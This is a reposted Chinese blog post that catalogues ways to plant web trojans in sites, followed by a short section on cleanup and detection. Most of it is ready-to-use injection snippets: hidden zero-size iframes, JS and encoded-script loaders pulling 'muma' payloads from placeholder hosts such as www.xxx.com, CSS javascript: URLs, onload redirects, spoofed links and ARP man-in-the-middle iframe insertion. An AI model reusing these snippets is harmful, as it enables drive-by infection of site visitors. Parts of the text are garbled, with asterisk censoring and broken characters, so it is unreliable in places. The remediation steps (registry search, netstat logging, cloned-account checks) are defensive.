一:框架掛馬

<iframe src=地址 width=0 height=0></iframe>

二:js文件掛馬

首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js，
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>

三:js變形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
四:body掛馬

<body οnlοad="window.location='地址';"></body>

五:隱蔽掛馬

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="[url]http://www.xxx.com/muma.htm/[/url]"></iframe>';

六:css中掛馬

body {
background-p_w_picpath: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:JAJA掛馬

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:圖片偽裝

<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>

九:偽裝調用：

<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高級欺騙

<a href="[url]http://www.163.com[/url](迷惑連接地址，顯示這個地址指向***地址)" onMouseOver="www_163_com(); return true;"> 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超級網馬—通過arp欺騙來直接掛馬

原理：arp中間人***，實際上相當于做了一次代理。

正常時候: A---->B ,A是訪問的正?？蛻?B是要***的服務器,C是被我們控制的主機
arp中間人***時候: A---->C---->B
B---->C---->A
實際上,C在這里做了一次代理的作用

那么HTTP請求發過來的時候,C判斷下是哪個客戶端發過來的包,轉發給B,然后B返回HTTP響應的時候,在HTTP響應包中,插入一段掛馬的代碼,比如 <iframe>...之類,再將修改過的包返回的正常的客戶A,就起到了一個掛馬的作用.在這個過程中,B是沒有任何感覺的,直接***的是正常的客戶A,如果A是管理員或者是目標單位,就直接掛上馬了。

如何處理網頁***：

1、找到嵌入的網頁***文件。以下，拿自己的經歷說事。找到的文件是wm.htm

2、在注冊表中查找wm.htm。很幸運，找到了。開始順藤摸瓜...

3、修改鍵值wm.htm為wm_nnd.htm。

4、再次查找wm.htm。很不幸，又查到了。說明有服務程序在作怪。嘿嘿，有意外發現。
cain.exe，據說是密碼嗅探器。

5、修改鍵值cain.exe為cain_nnd.exe。

6、查找cain.exe，仍然可以查到。嘻嘻，在預料之中。

7、懷疑wm.htm與cain.exe同流合污，背后有服務程序作后臺。

8、快查查看，系統服務程序。在運行->msconfig 或直接在命令行使用net start，查看可疑程序

9、發現temp*.exe（全名記不清了），立馬net stop server 。

10、快去修改鍵值wm.htm為wm_nnd.htm，cain.exe為cain_nnd.exe。

11、再次查找wm.htm或cain.exe,沒有找到。哈哈，很好。

12、觀察了幾天，沒再發生掛馬的現象。

另外，通過檢測網絡連接查看服務器是否中了***或病毒

1、使用netstat -an 查看所有和本地計算機建立連接的IP。

2、連接包含四個部分——proto(連接方式)、local address(本地連接地址)、foreign address(和本地建立連接的地址)、state(當前端口狀態)。 通過這個命令的詳細信息，可以完全監控計算機上的連接，從而達到控制計算機的目的。

3、手工制作bat程序，生成網絡連接日志文件供站長分析：bat文件代碼如下

REM 注釋：監控的時間
time /t>>Netstat.log
REM 每隔30秒，把服務器上通過tcp協議通訊的IP和端口寫入日志文件
Netstat -n -p tcp 30>>Netstat.log

注意：要謹慎使用，這會給服務器帶來性能影響。最好，在服務器發生異常，懷疑中***或病毒時，用來分析網絡連接日志。

僅僅這些還不夠，說說更嚴重的：

1、可惡的***者喜歡使用克隆賬號的方法來控制你的計算機?！八鼈儭奔せ钜粋€系統中的默認賬戶，但這個賬戶是不經常用的， 然后使用工具把這個賬戶提升到管理員權限，從表面上看來這個賬戶還是和原來一樣，但是這個克隆的賬戶卻是系統中最大的安全隱患。

2、趕快檢測系統帳戶：
a、在命令行下輸入net user，查看計算機上有些什么用戶。
b、使用“net user 用戶名”查看這個用戶屬于什么權限的及登錄時間等。
c、一般除了Administrator是administrators組的，如果你發現一個系統內置的用戶是屬于administrators組的，
那么別人在你的計算機上克隆賬戶的概率為90%。
d、是使用“net user 用戶名 /del” 來刪掉這個用戶，還是修改其它配置，這你說了算。

轉載于:https://blog.51cto.com/cicsoandms/35892

總結

以上是生活随笔為你收集整理的网页***大全的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。